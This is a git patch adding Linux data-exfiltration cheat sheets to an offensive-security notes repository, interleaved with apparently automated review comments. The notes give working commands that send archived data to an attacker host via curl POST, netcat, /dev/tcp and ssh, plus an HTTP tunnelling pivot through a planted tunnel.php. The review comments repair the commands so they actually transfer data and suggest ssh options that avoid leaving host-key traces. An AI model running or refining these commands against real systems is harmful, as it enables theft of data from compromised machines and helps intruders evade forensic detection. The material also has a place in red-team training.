From 851ed5ef3b83863b150bbe53ffca8afaa9f120e5 Mon Sep 17 00:00:00 2001
From: whx
Date: Sat, 27 Aug 2022 23:21:28 +0200
Subject: [PATCH] added http to exfiltration
---
exfiltration/linux/http_php.md | 47 ++++++++++++++++++++++++++++++++++
exfiltration/linux/nc.md | 24 +++++++++++++++++
exfiltration/linux/ssh.md | 11 ++++++++
3 files changed, 82 insertions(+)
create mode 100644 exfiltration/linux/http_php.md
create mode 100644 exfiltration/linux/ssh.md
diff --git a/exfiltration/linux/http_php.md b/exfiltration/linux/http_php.md
new file mode 100644
index 0000000..b5cf972
--- /dev/null
+++ b/exfiltration/linux/http_php.md
@@ -0,0 +1,47 @@
+# HTTP/PHP Exfiltration
+
+* On a pwned web server concat the following PHP code to an existing page
+```php
+
+```
+
+* POST the payload to the controlled web server
+```sh
+curl --data "file=$(tar zcf - | base64)" http://example.com/about.php
+```
+
+* Prepare the stored file through removing the url encoding
+```sh
+sudo sed -i 's/ /+/g' /tmp/out.b64
+```
+
+* Unarchive the data
+```sh
+cat /tmp/out.b64 | base64 -d | tar xvfz -
+```
+
+## Pivot via Tunneling over HTTP
+
+* [Neo-reGeorg's tool](https://github.com/L-codes/Neo-reGeorg)
+
+* Generate an encrypted client with a key via
+```sh
+python3 neoreg.py generate -k key.enc
+```
+
+* Upload `tunnel.php` to the web server created
+* Trigger the tunnel via
+```sh
+python3 neoreg.py -k key.enc -u http://example.com/tunnel.php
+```
+
+* Start socks5 via
+```sh
+curl --socks5 127.0.0.1:1080 http://target.example.com
+```
diff --git a/exfiltration/linux/nc.md b/exfiltration/linux/nc.md
index 8ab23e8..c96f77b 100644
--- a/exfiltration/linux/nc.md
+++ b/exfiltration/linux/nc.md
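Review bot: The POST step `curl --data "file=$(tar zcf - | base64)" http://example.com/about.php` gives tar no path operand, so GNU tar refuses to create an empty archive and the request body degenerates to an empty `file=`; the data to exfiltrate has to be named, e.g. `curl --data-urlencode "file=$(tar zcf - /path/to/data | base64 -w0)" http://example.com/about.php`. Switching to `--data-urlencode` (with `-w0` to stop base64 line-wrapping) also removes the need for the `sudo sed -i 's/ /+/g'` repair step, which exists only because `--data` sends the `+` characters of base64 unencoded and PHP's form parser decodes them as spaces. The ```php fence in this hunk is empty as shown, so the page never states what the server-side handler writes or where `/tmp/out.b64` comes from; if the snippet was lost in the patch it needs restoring, because every later step depends on it. Worth a one-line caveat that the POST travels over plain `http://`, so the base64 archive is readable by any inline monitoring, and that the final "Start socks5" step actually consumes the SOCKS5 listener Neo-reGeorg opens on 127.0.0.1:1080 rather than starting one.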
@@ -1,11 +1,35 @@ # Netcat +## Receiver + * RX ```sh nc -lp 8080 > out.txt ``` + +## Transceiver + * TX ```sh nc $ATTACKER_IP 8080 < in.txt ``` + +* TX without nc +```sh +cat > /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT +``` + * Have to be end manually after a while + +## Compress and Encode + +* Compress and encode the transmitted data +```sh +tar cfz - | base64 | dd conv=ebcdic > /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT +``` + +* On receiver's side, after `out.data` has been received +```sh +dd conv=ascii if=out.data | base64 -d > out.tar +tar xvf out.tar +```
diff --git a/exfiltration/linux/ssh.md b/exfiltration/linux/ssh.md
new file mode 100644
index 0000000..9153e40
--- /dev/null
+++ b/exfiltration/linux/ssh.md
@@ -0,0 +1,11 @@
+# SSH Exfiltration
+
+* Given: without `scp`
+
+## Compress
+
+* Archive the data on target, send it to the attacker. Unpack including preserved permissions
+```sh
+tar cf - | ssh user@$ATTACKER_IP "cd /tmp/; tar xpf -"
+```
+
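Review bot: `cat > /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT` under "TX without nc" reads from the terminal instead of from a file, which is the only reason the hunk has to warn that the transfer "has to be ended manually"; giving cat the input, `cat in.txt > /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT`, sends the file and closes the connection on EOF, matching the nc example directly above it. The compress step `tar cfz - | base64 | dd conv=ebcdic > /dev/tcp/...` has no path operand, so GNU tar refuses to create an empty archive and nothing is sent; it needs the files or directory to archive. The `conv=ebcdic`/`conv=ascii` pair is a byte-level transform, not encryption, and a one-line caveat that the stream is trivially recoverable by anyone capturing it (the underlying nc/`/dev/tcp` transport is cleartext) would stop readers treating it as protection. The receiver text refers to `out.data` while the RX command in this file writes `out.txt`; aligning the names would avoid confusion about what to feed to `dd conv=ascii`.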
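Review bot: `tar cf - | ssh user@$ATTACKER_IP "cd /tmp/; tar xpf -"` gives tar no path operand, so GNU tar refuses to create an empty archive and nothing is transferred; the files to exfiltrate must be named, `tar cf - /path/to/data | ssh user@$ATTACKER_IP "cd /tmp/; tar xpf -"`. The outbound ssh from the target will also prompt for and record the attacker's host key in the target user's `~/.ssh/known_hosts`, a forensic artifact a practitioner would either avoid with `-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no` or at least call out. "Given: without `scp`" reads as a fragment; something like "Assumes `scp` is not available on the target; requires an SSH account on the attacker host that the target can authenticate to" would state the preconditions clearly.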